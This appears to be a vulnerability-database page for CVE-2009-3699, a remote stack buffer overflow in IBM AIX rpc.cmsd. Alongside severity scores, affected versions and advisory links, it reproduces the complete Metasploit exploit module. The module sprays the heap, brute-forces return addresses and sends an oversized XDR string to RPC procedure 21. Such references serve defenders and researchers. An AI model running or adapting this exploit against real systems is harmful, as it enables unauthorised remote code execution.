CVE-2009-3699 : Detail

CVE-2009-3699

Overflow
88.32%V3
Network
2009-10-15
08h00 +00:00
2017-08-16
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Stack-based buffer overflow in libcsa.a (aka the calendar daemon library) in IBM AIX 5.x through 5.3.10 and 6.x through 6.1.3, and VIOS 2.1 and earlier, allows remote attackers to execute arbitrary code via a long XDR string in the first argument to procedure 21 of rpc.cmsd.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 16929

Publication date : 2010-11-10
23h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: rpc_cmsd_opcode21.rb 10998 2010-11-11 22:43:22Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SunRPC include Msf::Exploit::Brute def initialize(info = {}) super(update_info(info, 'Name' => 'AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow vulnerability in opcode 21 handled by rpc.cmsd on AIX. By making a request with a long string passed to the first argument of the "rtable_create" RPC, a stack based buffer overflow occurs. This leads to arbitrary code execution. NOTE: Unsuccessful attempts may cause inetd/portmapper to enter a state where further attempts are not possible. }, 'Author' => [ 'Rodrigo Rubira Branco (BSDaemon)', 'jduck', ], 'Version' => '$Revision: 10998 $', 'References' => [ [ 'CVE', '2009-3699' ], [ 'OSVDB', '58726' ], [ 'BID', '36615' ], [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825' ], [ 'URL', 'http://aix.software.ibm.com/aix/efixes/security/cmsd_advisory.asc' ] ], 'Platform' => [ 'aix' ], 'Payload' => { 'Space' => 4104, 'BadChars' => "\x00", # The RPC function splits the string by 0x40, watch out! # It's not a payload badchar since we're putting the payload elsewhere... 'DisableNops' => true }, 'Targets' => [ [ 'IBM AIX Version 5.1', { 'Arch' => 'ppc', 'Platform' => 'aix', 'AIX' => '5.1', 'Bruteforce' => { 'Start' => { 'Ret' => 0x2022dfc8 }, #worked on ibmoz - 'Start' => { 'Ret' => 0x2022e8c8 }, 'Stop' => { 'Ret' => 0x202302c8 }, 'Step' => 600 } } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 07 2009')) end def brute_exploit(brute_target) if not @aixpayload datastore['AIX'] = target['AIX'] @aixpayload = regenerate_payload.encoded end print_status("Trying to exploit rpc.cmsd with address 0x%x ..." % brute_target['Ret']) begin if (not sunrpc_create('udp', 100068, 4)) raise RuntimeError, 'sunrpc_create failed' end # spray the heap a bit (work around powerpc cache issues) buf = make_nops(1024 - @aixpayload.length) buf << @aixpayload xdr = XDR.encode(buf, buf) 10.times { sunrpc_call(7, xdr, 2) } #print_status("ATTACH DEBUGGER NOW!"); select(nil,nil,nil,5) buf = rand_text_alphanumeric(payload_space) buf << [brute_target['Ret']].pack('N') xdr = XDR.encode(buf, "") sunrpc_authunix('localhost', 0, 0, []) sunrpc_call(21, xdr, 2) handler(sunrpc_callsock) sunrpc_destroy rescue Rex::Proto::SunRPC::RPCTimeout # print_error('RPCTimeout') rescue EOFError # print_error('EOFError') end end end

Products Mentioned

Configuraton 0

Ibm>>Vios >> Version To (including) 2.1.0

Ibm>>Vios >> Version 1.4

Ibm>>Vios >> Version 1.5.0

    Ibm>>Vios >> Version 1.5.1

      Ibm>>Vios >> Version 1.5.2

        Ibm>>Aix >> Version 5

        Ibm>>Aix >> Version 5.1

        Ibm>>Aix >> Version 5.1.0.10

        Ibm>>Aix >> Version 5.1l

        Ibm>>Aix >> Version 5.2

        Ibm>>Aix >> Version 5.2.0

        Ibm>>Aix >> Version 5.2.0.50

        Ibm>>Aix >> Version 5.2.0.54

        Ibm>>Aix >> Version 5.2.2

        Ibm>>Aix >> Version 5.2_l

        Ibm>>Aix >> Version 5.3

        Ibm>>Aix >> Version 5.3

        Ibm>>Aix >> Version 5.3.0

        Ibm>>Aix >> Version 5.3.0.20

        Ibm>>Aix >> Version 5.3.7

        Ibm>>Aix >> Version 5.3.8

        Ibm>>Aix >> Version 5.3.9

        Ibm>>Aix >> Version 5.3.10

          Ibm>>Aix >> Version 5.3_l

          Ibm>>Aix >> Version 5.3_ml03

          Ibm>>Aix >> Version 5l

          Ibm>>Aix >> Version 6.1

          Ibm>>Aix >> Version 6.1.0

          Ibm>>Aix >> Version 6.1.1

          Ibm>>Aix >> Version 6.1.2

          Ibm>>Aix >> Version 6.1.3

            References

            http://www.vupen.com/english/advisories/2009/2846
            Tags : vdb-entry, x_refsource_VUPEN
            http://www.ibm.com/support/docview.wss?uid=isg1IZ62237
            Tags : vendor-advisory, x_refsource_AIXAPAR
            http://www.ibm.com/support/docview.wss?uid=isg1IZ62570
            Tags : vendor-advisory, x_refsource_AIXAPAR
            http://www.ibm.com/support/docview.wss?uid=isg1IZ61628
            Tags : vendor-advisory, x_refsource_AIXAPAR
            http://securitytracker.com/id?1022996
            Tags : vdb-entry, x_refsource_SECTRACK
            http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825
            Tags : third-party-advisory, x_refsource_IDEFENSE
            http://www.ibm.com/support/docview.wss?uid=isg1IZ62569
            Tags : vendor-advisory, x_refsource_AIXAPAR
            http://www.ibm.com/support/docview.wss?uid=isg1IZ62571
            Tags : vendor-advisory, x_refsource_AIXAPAR
            http://www.ibm.com/support/docview.wss?uid=isg1IZ62123
            Tags : vendor-advisory, x_refsource_AIXAPAR
            http://www.ibm.com/support/docview.wss?uid=isg1IZ62672
            Tags : vendor-advisory, x_refsource_AIXAPAR
            http://www.ibm.com/support/docview.wss?uid=isg1IZ62572
            Tags : vendor-advisory, x_refsource_AIXAPAR
            http://secunia.com/advisories/36978
            Tags : third-party-advisory, x_refsource_SECUNIA
            http://www.ibm.com/support/docview.wss?uid=isg1IZ61717
            Tags : vendor-advisory, x_refsource_AIXAPAR
            http://www.osvdb.org/58726
            Tags : vdb-entry, x_refsource_OSVDB
            http://www.securityfocus.com/bid/36615
            Tags : vdb-entry, x_refsource_BID